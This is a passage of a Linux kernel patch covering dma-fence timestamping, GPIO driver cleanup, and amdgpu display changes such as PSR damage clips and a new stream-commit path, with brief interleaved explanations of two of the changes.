+@@ -169,7 +170,7 @@ struct dma_fence *dma_fence_allocate_private_stub(void)
+ 	set_bit(DMA_FENCE_FLAG_ENABLE_SIGNAL_BIT,
+ 		&fence->flags);
+ 
+-	dma_fence_signal(fence);
++	dma_fence_signal_timestamp(fence, timestamp);
+ 
+ 	return fence;
+ }
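The dma-fence hunks make the merged-stub path preserve timing information: when every input fence has already signaled, the private stub now carries the newest signaled timestamp rather than a zero-time shared stub, and a fence that is signaled but not yet timestamped counts as "now". A sketch of that selection, assuming an already-unwrapped fence array:

#include <linux/bitops.h>
#include <linux/dma-fence.h>
#include <linux/ktime.h>

static ktime_t newest_signaled_stamp(struct dma_fence **fences, unsigned int n)
{
	ktime_t stamp = ns_to_ktime(0);
	unsigned int i;

	for (i = 0; i < n; i++) {
		struct dma_fence *f = fences[i];

		if (!dma_fence_is_signaled(f))
			continue;
		if (!test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT, &f->flags)) {
			stamp = ktime_get();	/* still signaling: use now */
			continue;
		}
		if (ktime_after(f->timestamp, stamp))
			stamp = f->timestamp;
	}
	return stamp;
}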
+diff --git a/drivers/gpio/gpio-mvebu.c b/drivers/gpio/gpio-mvebu.c
+index 91a4232ee58c2..0ba9d04183a60 100644
+--- a/drivers/gpio/gpio-mvebu.c
++++ b/drivers/gpio/gpio-mvebu.c
+@@ -874,7 +874,7 @@ static int mvebu_pwm_probe(struct platform_device *pdev,
+ 
+ 	spin_lock_init(&mvpwm->lock);
+ 
+-	return pwmchip_add(&mvpwm->chip);
++	return devm_pwmchip_add(dev, &mvpwm->chip);
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -1112,6 +1112,13 @@ static int mvebu_gpio_probe_syscon(struct platform_device *pdev,
+ 	return 0;
+ }
+ 
++static void mvebu_gpio_remove_irq_domain(void *data)
++{
++	struct irq_domain *domain = data;
++
++	irq_domain_remove(domain);
++}
++
+ static int mvebu_gpio_probe(struct platform_device *pdev)
+ {
+ 	struct mvebu_gpio_chip *mvchip;
+@@ -1243,17 +1250,21 @@ static int mvebu_gpio_probe(struct platform_device *pdev)
+ 	if (!mvchip->domain) {
+ 		dev_err(&pdev->dev, "couldn't allocate irq domain %s (DT).\n",
+ 			mvchip->chip.label);
+-		err = -ENODEV;
+-		goto err_pwm;
++		return -ENODEV;
+ 	}
+ 
++	err = devm_add_action_or_reset(&pdev->dev, mvebu_gpio_remove_irq_domain,
++				       mvchip->domain);
++	if (err)
++		return err;
++
+ 	err = irq_alloc_domain_generic_chips(
+ 	    mvchip->domain, ngpios, 2, np->name, handle_level_irq,
+ 	    IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_LEVEL, 0, 0);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "couldn't allocate irq chips %s (DT).\n",
+ 			mvchip->chip.label);
+-		goto err_domain;
++		return err;
+ 	}
+ 
+ 	/*
+@@ -1293,13 +1304,6 @@ static int mvebu_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	return 0;
+-
+-err_domain:
+-	irq_domain_remove(mvchip->domain);
+-err_pwm:
+-	pwmchip_remove(&mvchip->mvpwm->chip);
+-
+-	return err;
+ }
+ 
+ static struct platform_driver mvebu_gpio_driver = {
+diff --git a/drivers/gpio/gpio-tps68470.c b/drivers/gpio/gpio-tps68470.c
+index aaddcabe9b359..532deaddfd4e2 100644
+--- a/drivers/gpio/gpio-tps68470.c
++++ b/drivers/gpio/gpio-tps68470.c
+@@ -91,13 +91,13 @@ static int tps68470_gpio_output(struct gpio_chip *gc, unsigned int offset,
+ 	struct tps68470_gpio_data *tps68470_gpio = gpiochip_get_data(gc);
+ 	struct regmap *regmap = tps68470_gpio->tps68470_regmap;
+ 
++	/* Set the initial value */
++	tps68470_gpio_set(gc, offset, value);
++
+ 	/* rest are always outputs */
+ 	if (offset >= TPS68470_N_REGULAR_GPIO)
+ 		return 0;
+ 
+-	/* Set the initial value */
+-	tps68470_gpio_set(gc, offset, value);
+-
+ 	return regmap_update_bits(regmap, TPS68470_GPIO_CTL_REG_A(offset),
+ 				 TPS68470_GPIO_MODE_MASK,
+ 				 TPS68470_GPIO_MODE_OUT_CMOS);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 39c5e14b02529..c0e782a95e72e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1262,6 +1262,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
++bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index ef0a94c70859b..30c97ee375636 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1333,6 +1333,25 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 	return true;
+ }
+ 
++/*
++ * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
++ * speed switching. Until we have confirmation from Intel that a specific host
++ * supports it, it's safer that we keep it disabled for all.
++ *
++ * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
++ * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
++ */
++bool amdgpu_device_pcie_dynamic_switching_supported(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	if (c->x86_vendor == X86_VENDOR_INTEL)
++		return false;
++#endif
++	return true;
++}
++
+ /**
+  * amdgpu_device_should_use_aspm - check if the device should program ASPM
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 0af9fb4098e8a..eecbd8eeb1f5a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -472,11 +472,11 @@ static int psp_sw_init(void *handle)
+ 	return 0;
+ 
+ failed2:
+-	amdgpu_bo_free_kernel(&psp->fw_pri_bo,
+-			      &psp->fw_pri_mc_addr, &psp->fw_pri_buf);
+-failed1:
+ 	amdgpu_bo_free_kernel(&psp->fence_buf_bo,
+ 			      &psp->fence_buf_mc_addr, &psp->fence_buf);
++failed1:
++	amdgpu_bo_free_kernel(&psp->fw_pri_bo,
++			      &psp->fw_pri_mc_addr, &psp->fw_pri_buf);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index ce5df7927c21f..9b2915764306b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4948,6 +4948,30 @@ static int fill_dc_plane_attributes(struct amdgpu_device *adev,
+ 	return 0;
+ }
+ 
++static inline void fill_dc_dirty_rect(struct drm_plane *plane,
++				      struct rect *dirty_rect, int32_t x,
++				      int32_t y, int32_t width, int32_t height,
++				      int *i, bool ffu)
++{
++	WARN_ON(*i >= DC_MAX_DIRTY_RECTS);
++
++	dirty_rect->x = x;
++	dirty_rect->y = y;
++	dirty_rect->width = width;
++	dirty_rect->height = height;
++
++	if (ffu)
++		drm_dbg(plane->dev,
++			"[PLANE:%d] PSR FFU dirty rect size (%d, %d)\n",
++			plane->base.id, width, height);
++	else
++		drm_dbg(plane->dev,
++			"[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)",
++			plane->base.id, x, y, width, height);
++
++	(*i)++;
++}
++
+ /**
+  * fill_dc_dirty_rects() - Fill DC dirty regions for PSR selective updates
+  *
+@@ -4968,10 +4992,6 @@ static int fill_dc_plane_attributes(struct amdgpu_device *adev,
+  * addition, certain use cases - such as cursor and multi-plane overlay (MPO) -
+  * implicitly provide damage clips without any client support via the plane
+  * bounds.
+- *
+- * Today, amdgpu_dm only supports the MPO and cursor usecase.
+- *
+- * TODO: Also enable for FB_DAMAGE_CLIPS
+  */
+ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 				struct drm_plane_state *old_plane_state,
+@@ -4982,12 +5002,11 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	struct dm_crtc_state *dm_crtc_state = to_dm_crtc_state(crtc_state);
+ 	struct rect *dirty_rects = flip_addrs->dirty_rects;
+ 	uint32_t num_clips;
++	struct drm_mode_rect *clips;
+ 	bool bb_changed;
+ 	bool fb_changed;
+ 	u32 i = 0;
+ 
+-	flip_addrs->dirty_rect_count = 0;
+-
+ 	/*
+	 * Cursor plane has its own dirty rect update interface. See
+ 	 * dcn10_dmub_update_cursor_data and dmub_cmd_update_cursor_info_data
+@@ -4995,20 +5014,20 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	if (plane->type == DRM_PLANE_TYPE_CURSOR)
+ 		return;
+ 
+-	/*
+-	 * Today, we only consider MPO use-case for PSR SU. If MPO not
+-	 * requested, and there is a plane update, do FFU.
+-	 */
++	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
++	clips = drm_plane_get_damage_clips(new_plane_state);
++
+ 	if (!dm_crtc_state->mpo_requested) {
+-		dirty_rects[0].x = 0;
+-		dirty_rects[0].y = 0;
+-		dirty_rects[0].width = dm_crtc_state->base.mode.crtc_hdisplay;
+-		dirty_rects[0].height = dm_crtc_state->base.mode.crtc_vdisplay;
+-		flip_addrs->dirty_rect_count = 1;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR FFU dirty rect size (%d, %d)\n",
+-				 new_plane_state->plane->base.id,
+-				 dm_crtc_state->base.mode.crtc_hdisplay,
+-				 dm_crtc_state->base.mode.crtc_vdisplay);
++		if (!num_clips || num_clips > DC_MAX_DIRTY_RECTS)
++			goto ffu;
++
++		for (; flip_addrs->dirty_rect_count < num_clips; clips++)
++			fill_dc_dirty_rect(new_plane_state->plane,
++					   &dirty_rects[flip_addrs->dirty_rect_count],
++					   clips->x1, clips->y1,
++					   clips->x2 - clips->x1, clips->y2 - clips->y1,
++					   &flip_addrs->dirty_rect_count,
++					   false);
+ 		return;
+ 	}
+ 
+@@ -5019,7 +5038,6 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 	 * If plane is moved or resized, also add old bounding box to dirty
+ 	 * rects.
+ 	 */
+-	num_clips = drm_plane_get_damage_clips_count(new_plane_state);
+ 	fb_changed = old_plane_state->fb->base.id !=
+ 		     new_plane_state->fb->base.id;
+ 	bb_changed = (old_plane_state->crtc_x != new_plane_state->crtc_x ||
+@@ -5027,36 +5045,51 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 		      old_plane_state->crtc_w != new_plane_state->crtc_w ||
+ 		      old_plane_state->crtc_h != new_plane_state->crtc_h);
+ 
+-	DRM_DEBUG_DRIVER("[PLANE:%d] PSR bb_changed:%d fb_changed:%d num_clips:%d\n",
+-			 new_plane_state->plane->base.id,
+-			 bb_changed, fb_changed, num_clips);
++	drm_dbg(plane->dev,
++		"[PLANE:%d] PSR bb_changed:%d fb_changed:%d num_clips:%d\n",
++		new_plane_state->plane->base.id,
++		bb_changed, fb_changed, num_clips);
+ 
+-	if (num_clips || fb_changed || bb_changed) {
+-		dirty_rects[i].x = new_plane_state->crtc_x;
+-		dirty_rects[i].y = new_plane_state->crtc_y;
+-		dirty_rects[i].width = new_plane_state->crtc_w;
+-		dirty_rects[i].height = new_plane_state->crtc_h;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)\n",
+-				 new_plane_state->plane->base.id,
+-				 dirty_rects[i].x, dirty_rects[i].y,
+-				 dirty_rects[i].width, dirty_rects[i].height);
+-		i += 1;
+-	}
++	if ((num_clips + (bb_changed ? 2 : 0)) > DC_MAX_DIRTY_RECTS)
++		goto ffu;
+ 
+-	/* Add old plane bounding-box if plane is moved or resized */
+ 	if (bb_changed) {
+-		dirty_rects[i].x = old_plane_state->crtc_x;
+-		dirty_rects[i].y = old_plane_state->crtc_y;
+-		dirty_rects[i].width = old_plane_state->crtc_w;
+-		dirty_rects[i].height = old_plane_state->crtc_h;
+-		DRM_DEBUG_DRIVER("[PLANE:%d] PSR SU dirty rect at (%d, %d) size (%d, %d)\n",
+-				old_plane_state->plane->base.id,
+-				dirty_rects[i].x, dirty_rects[i].y,
+-				dirty_rects[i].width, dirty_rects[i].height);
+-		i += 1;
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   new_plane_state->crtc_x,
++				   new_plane_state->crtc_y,
++				   new_plane_state->crtc_w,
++				   new_plane_state->crtc_h, &i, false);
++
++		/* Add old plane bounding-box if plane is moved or resized */
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   old_plane_state->crtc_x,
++				   old_plane_state->crtc_y,
++				   old_plane_state->crtc_w,
++				   old_plane_state->crtc_h, &i, false);
++	}
++
++	if (num_clips) {
++		for (; i < num_clips; clips++)
++			fill_dc_dirty_rect(new_plane_state->plane,
++					   &dirty_rects[i], clips->x1,
++					   clips->y1, clips->x2 - clips->x1,
++					   clips->y2 - clips->y1, &i, false);
++	} else if (fb_changed && !bb_changed) {
++		fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[i],
++				   new_plane_state->crtc_x,
++				   new_plane_state->crtc_y,
++				   new_plane_state->crtc_w,
++				   new_plane_state->crtc_h, &i, false);
+ 	}
+ 
+ 	flip_addrs->dirty_rect_count = i;
++	return;
++
++ffu:
++	fill_dc_dirty_rect(new_plane_state->plane, &dirty_rects[0], 0, 0,
++			   dm_crtc_state->base.mode.crtc_hdisplay,
++			   dm_crtc_state->base.mode.crtc_vdisplay,
++			   &flip_addrs->dirty_rect_count, true);
+ }
+ 
+ static void update_stream_scaling_settings(const struct drm_display_mode *mode,
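The amdgpu_dm change teaches PSR selective updates to consume client-supplied FB_DAMAGE_CLIPS (enabled per plane in the dm_plane hunk further down), falling back to a full-frame update whenever there are no clips or too many. DRM damage clips are corner pairs while DC dirty rects are origin plus size, so the conversion is just (sketch, hypothetical struct names):

struct clip { int x1, y1, x2, y2; };		/* like struct drm_mode_rect */
struct rect { int x, y, width, height; };	/* like DC's struct rect */

static void clip_to_rect(const struct clip *c, struct rect *r)
{
	r->x = c->x1;
	r->y = c->y1;
	r->width  = c->x2 - c->x1;	/* x2/y2 are exclusive */
	r->height = c->y2 - c->y1;
}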
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 05708684c9f58..d07e1053b36b3 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -677,7 +677,7 @@ void dm_handle_mst_sideband_msg_ready_event(
+ 
+ 			if (retry == 3) {
+ 				DRM_ERROR("Failed to ack MST event.\n");
+-				return;
++				break;
+ 			}
+ 
+ 			drm_dp_mst_hpd_irq_send_new_request(&aconnector->mst_mgr);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index e6854f7270a66..3c50b3ff79541 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -1600,6 +1600,10 @@ int amdgpu_dm_plane_init(struct amdgpu_display_manager *dm,
+ 		drm_plane_create_rotation_property(plane, DRM_MODE_ROTATE_0,
+ 						   supported_rotations);
+ 
++	if (dm->adev->ip_versions[DCE_HWIP][0] > IP_VERSION(3, 0, 1) &&
++	    plane->type != DRM_PLANE_TYPE_CURSOR)
++		drm_plane_enable_fb_damage_clips(plane);
++
+ 	drm_plane_helper_add(plane, &dm_plane_helper_funcs);
+ 
+ #ifdef CONFIG_DRM_AMD_DC_HDR
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 872d06fe14364..3eb8794807d2b 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -24,6 +24,7 @@
+  */
+ 
+ #include "amdgpu_dm_psr.h"
++#include "dc_dmub_srv.h"
+ #include "dc.h"
+ #include "dm_helpers.h"
+ #include "amdgpu_dm.h"
+@@ -50,7 +51,7 @@ static bool link_supports_psrsu(struct dc_link *link)
+ 	    !link->dpcd_caps.psr_info.psr2_su_y_granularity_cap)
+ 		return false;
+ 
+-	return true;
++	return dc_dmub_check_min_version(dc->ctx->dmub_srv->dmub);
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+index 20a06c04e4a1d..e43b4d7dc60e2 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_clk_mgr.c
+@@ -108,6 +108,11 @@ static int dcn314_get_active_display_cnt_wa(
+ 				stream->signal == SIGNAL_TYPE_DVI_SINGLE_LINK ||
+ 				stream->signal == SIGNAL_TYPE_DVI_DUAL_LINK)
+ 			tmds_present = true;
++
++		/* Checking stream / link detection ensuring that PHY is active*/
++		if (dc_is_dp_signal(stream->signal) && !stream->dpms_off)
++			display_count++;
++
+ 	}
+ 
+ 	for (i = 0; i < dc->link_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index cca0143444164..8f9c60ed6f8b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -135,9 +135,7 @@ static const char DC_BUILD_ID[] = "production-build";
+  * one or two (in the pipe-split case).
+  */
+ 
+-/*******************************************************************************
+- * Private functions
+- ******************************************************************************/
++/* Private functions */
+ 
+ static inline void elevate_update_type(enum surface_update_type *original, enum surface_update_type new)
+ {
+@@ -384,16 +382,18 @@ static void dc_perf_trace_destroy(struct dc_perf_trace **perf_trace)
+ }
+ 
+ /**
+- *  dc_stream_adjust_vmin_vmax:
++ *  dc_stream_adjust_vmin_vmax - look up pipe context & update parts of DRR
++ *  @dc:     dc reference
++ *  @stream: Initial dc stream state
++ *  @adjust: Updated parameters for vertical_total_min and vertical_total_max
+  *
+  *  Looks up the pipe context of dc_stream_state and updates the
+  *  vertical_total_min and vertical_total_max of the DRR, Dynamic Refresh
+  *  Rate, which is a power-saving feature that targets reducing panel
+  *  refresh rate while the screen is static
+  *
+- *  @dc:     dc reference
+- *  @stream: Initial dc stream state
+- *  @adjust: Updated parameters for vertical_total_min and vertical_total_max
++ *  Return: %true if the pipe context is found and adjusted;
++ *          %false if the pipe context is not found.
+  */
+ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ 		struct dc_stream_state *stream,
+@@ -429,18 +429,17 @@ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ }
+ 
+ /**
+- *****************************************************************************
+- *  Function: dc_stream_get_last_vrr_vtotal
++ * dc_stream_get_last_used_drr_vtotal - Looks up the pipe context of
++ * dc_stream_state and gets the last VTOTAL used by DRR (Dynamic Refresh Rate)
+  *
+- *  @brief
+- *     Looks up the pipe context of dc_stream_state and gets the
+- *     last VTOTAL used by DRR (Dynamic Refresh Rate)
++ * @dc: [in] dc reference
++ * @stream: [in] Initial dc stream state
++ * @refresh_rate: [in] new refresh_rate
+  *
+- *  @param [in] dc: dc reference
+- *  @param [in] stream: Initial dc stream state
+- *  @param [in] adjust: Updated parameters for vertical_total_min and
+- *  vertical_total_max
+- *****************************************************************************
++ * Return: %true if the pipe context is found and there is an associated
++ *         timing_generator for the DC;
++ *         %false if the pipe context is not found or there is no
++ *         timing_generator for the DC.
+  */
+ bool dc_stream_get_last_used_drr_vtotal(struct dc *dc,
+ 		struct dc_stream_state *stream,
+@@ -587,7 +586,10 @@ bool dc_stream_stop_dmcu_crc_win_update(struct dc *dc, struct dc_stream_state *s
+  *              once.
+  *
+  * By default, only CRC0 is configured, and the entire frame is used to
+- * calculate the crc.
++ * calculate the CRC.
++ *
++ * Return: %false if the stream is not found or CRC capture is not supported;
++ *         %true if the stream has been configured.
+  */
+ bool dc_stream_configure_crc(struct dc *dc, struct dc_stream_state *stream,
+ 			     struct crc_params *crc_window, bool enable, bool continuous)
+@@ -656,7 +658,7 @@ bool dc_stream_configure_crc(struct dc *dc, struct dc_stream_state *stream,
+  * dc_stream_configure_crc needs to be called beforehand to enable CRCs.
+  *
+  * Return:
+- * false if stream is not found, or if CRCs are not enabled.
++ * %false if stream is not found, or if CRCs are not enabled.
+  */
+ bool dc_stream_get_crc(struct dc *dc, struct dc_stream_state *stream,
+ 		       uint32_t *r_cr, uint32_t *g_y, uint32_t *b_cb)
+@@ -1236,9 +1238,7 @@ static void wait_for_no_pipes_pending(struct dc *dc, struct dc_state *context)
+ 	PERF_TRACE();
+ }
+ 
+-/*******************************************************************************
+- * Public functions
+- ******************************************************************************/
++/* Public functions */
+ 
+ struct dc *dc_create(const struct dc_init_data *init_params)
+ {
+@@ -1505,17 +1505,19 @@ static void program_timing_sync(
+ 	}
+ }
+ 
+-static bool context_changed(
+-		struct dc *dc,
+-		struct dc_state *context)
++static bool streams_changed(struct dc *dc,
++			    struct dc_stream_state *streams[],
++			    uint8_t stream_count)
+ {
+ 	uint8_t i;
+ 
+-	if (context->stream_count != dc->current_state->stream_count)
++	if (stream_count != dc->current_state->stream_count)
+ 		return true;
+ 
+ 	for (i = 0; i < dc->current_state->stream_count; i++) {
+-		if (dc->current_state->streams[i] != context->streams[i])
++		if (dc->current_state->streams[i] != streams[i])
++			return true;
++		if (!streams[i]->link->link_state_valid)
+ 			return true;
+ 	}
+ 
+@@ -1745,6 +1747,8 @@ void dc_z10_save_init(struct dc *dc)
+ /*
+  * Applies given context to HW and copy it into current context.
+  * It's up to the user to release the src context afterwards.
++ *
++ * Return: an enum dc_status result code for the operation
+  */
+ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *context)
+ {
+@@ -1911,12 +1915,114 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 	return result;
+ }
+ 
++static bool commit_minimal_transition_state(struct dc *dc,
++		struct dc_state *transition_base_context);
++
++/**
++ * dc_commit_streams - Commit current stream state
++ *
++ * @dc: DC object with the commit state to be configured in the hardware
++ * @streams: Array with a list of stream state
++ * @stream_count: Total of streams
++ *
++ * Function responsible for commit streams change to the hardware.
++ *
++ * Return:
++ * Return DC_OK if everything work as expected, otherwise, return a dc_status
++ * code.
++ */
++enum dc_status dc_commit_streams(struct dc *dc,
++				 struct dc_stream_state *streams[],
++				 uint8_t stream_count)
++{
++	int i, j;
++	struct dc_state *context;
++	enum dc_status res = DC_OK;
++	struct dc_validation_set set[MAX_STREAMS] = {0};
++	struct pipe_ctx *pipe;
++	bool handle_exit_odm2to1 = false;
++
++	if (!streams_changed(dc, streams, stream_count))
++		return res;
++
++	DC_LOG_DC("%s: %d streams\n", __func__, stream_count);
++
++	for (i = 0; i < stream_count; i++) {
++		struct dc_stream_state *stream = streams[i];
++		struct dc_stream_status *status = dc_stream_get_status(stream);
++
++		dc_stream_log(dc, stream);
++
++		set[i].stream = stream;
++
++		if (status) {
++			set[i].plane_count = status->plane_count;
++			for (j = 0; j < status->plane_count; j++)
++				set[i].plane_states[j] = status->plane_states[j];
++		}
++	}
++
++	/* Check for case where we are going from odm 2:1 to max
++	 *  pipe scenario.  For these cases, we will call
++	 *  commit_minimal_transition_state() to exit out of odm 2:1
++	 *  first before processing new streams
++	 */
++	if (stream_count == dc->res_pool->pipe_count) {
++		for (i = 0; i < dc->res_pool->pipe_count; i++) {
++			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			if (pipe->next_odm_pipe)
++				handle_exit_odm2to1 = true;
++		}
++	}
++
++	if (handle_exit_odm2to1)
++		res = commit_minimal_transition_state(dc, dc->current_state);
++
++	context = dc_create_state(dc);
++	if (!context)
++		goto context_alloc_fail;
++
++	dc_resource_state_copy_construct_current(dc, context);
++
++	/*
++	 * Previous validation was performed with fast_validation = true and
++	 * the full DML state required for hardware programming was skipped.
++	 *
++	 * Re-validate here to calculate these parameters / watermarks.
++	 */
++	res = dc_validate_global_state(dc, context, false);
++	if (res != DC_OK) {
++		DC_LOG_ERROR("DC commit global validation failure: %s (%d)",
++			     dc_status_to_str(res), res);
++		return res;
++	}
++
++	res = dc_commit_state_no_check(dc, context);
++
++context_alloc_fail:
++
++	DC_LOG_DC("%s Finished.\n", __func__);
++
++	return res;
++}
++
++/* TODO: When the transition to the new commit sequence is done, remove this
++ * function in favor of dc_commit_streams. */
+ bool dc_commit_state(struct dc *dc, struct dc_state *context)
+ {
+ 	enum dc_status result = DC_ERROR_UNEXPECTED;
+ 	int i;
+ 
+-	if (!context_changed(dc, context))
++	/* TODO: Since changing the commit sequence can have a huge impact,
++	 * we decided to only enable it for DCN3x. However, as soon as
++	 * we get more confident about this change, we'll need to enable
++	 * the new sequence for all ASICs. */
++	if (dc->ctx->dce_version >= DCN_VERSION_3_2) {
++		result = dc_commit_streams(dc, context->streams, context->stream_count);
++		return result == DC_OK;
++	}
++
++	if (!streams_changed(dc, context->streams, context->stream_count))
+ 		return DC_OK;
+ 
+ 	DC_LOG_DC("%s: %d streams\n",
+@@ -2482,8 +2588,11 @@ static enum surface_update_type check_update_surfaces_for_stream(
+ 
+ 		if (stream_update->mst_bw_update)
+ 			su_flags->bits.mst_bw = 1;
+-		if (stream_update->crtc_timing_adjust && dc_extended_blank_supported(dc))
+-			su_flags->bits.crtc_timing_adjust = 1;
++
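++		/* Flag FAMS as changed when VRR state changes on a FreeSync-on-desktop stream */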
++		if (stream_update->stream && stream_update->stream->freesync_on_desktop &&
++			(stream_update->vrr_infopacket || stream_update->allow_freesync ||
++				stream_update->vrr_active_variable))
++			su_flags->bits.fams_changed = 1;
+ 
+ 		if (su_flags->raw != 0)
+ 			overall_type = UPDATE_TYPE_FULL;
+@@ -3648,17 +3757,17 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* For SubVP when adding MPO video we need to add a minimal transition.
++	/* For SubVP when adding or removing planes we need to add a minimal transition
++	 * (even when disabling all planes). Whenever disabling a phantom pipe, we
++	 * must use the minimal transition path to disable the pipe correctly.
+ 	 */
+ 	if (cur_stream_status && stream->mall_stream_config.type == SUBVP_MAIN) {
+ 		/* determine if minimal transition is required due to SubVP*/
+-		if (surface_count > 0) {
+-			if (cur_stream_status->plane_count > surface_count) {
+-				force_minimal_pipe_splitting = true;
+-			} else if (cur_stream_status->plane_count < surface_count) {
+-				force_minimal_pipe_splitting = true;
+-				*is_plane_addition = true;
+-			}
++		if (cur_stream_status->plane_count > surface_count) {
++			force_minimal_pipe_splitting = true;
++		} else if (cur_stream_status->plane_count < surface_count) {
++			force_minimal_pipe_splitting = true;
++			*is_plane_addition = true;
+ 		}
+ 	}
+ 
+@@ -3675,6 +3784,8 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	enum dc_status ret = DC_ERROR_UNEXPECTED;
+ 	unsigned int i, j;
+ 	unsigned int pipe_in_use = 0;
++	bool subvp_in_use = false;
++	bool odm_in_use = false;
+ 
+ 	if (!transition_context)
+ 		return false;
+@@ -3687,6 +3798,30 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 			pipe_in_use++;
+ 	}
+ 
++	/* If SubVP is enabled and we are adding or removing planes from any main subvp
++	 * pipe, we must use the minimal transition.
++	 */
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++
++		if (pipe->stream && pipe->stream->mall_stream_config.type == SUBVP_PHANTOM) {
++			subvp_in_use = true;
++			break;
++		}
++	}
++
++	/* If ODM is enabled and we are adding or removing planes from any ODM
++	 * pipe, we must use the minimal transition.
++	 */
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++
++		if (pipe->stream && pipe->next_odm_pipe) {
++			odm_in_use = true;
++			break;
++		}
++	}
++
+ 	/* When the OS add a new surface if we have been used all of pipes with odm combine
+ 	 * and mpc split feature, it need use commit_minimal_transition_state to transition safely.
+ 	 * After OS exit MPO, it will back to use odm and mpc split with all of pipes, we need
+@@ -3695,7 +3830,7 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	 * Reduce the scenarios to use dc_commit_state_no_check in the stage of flip. Especially
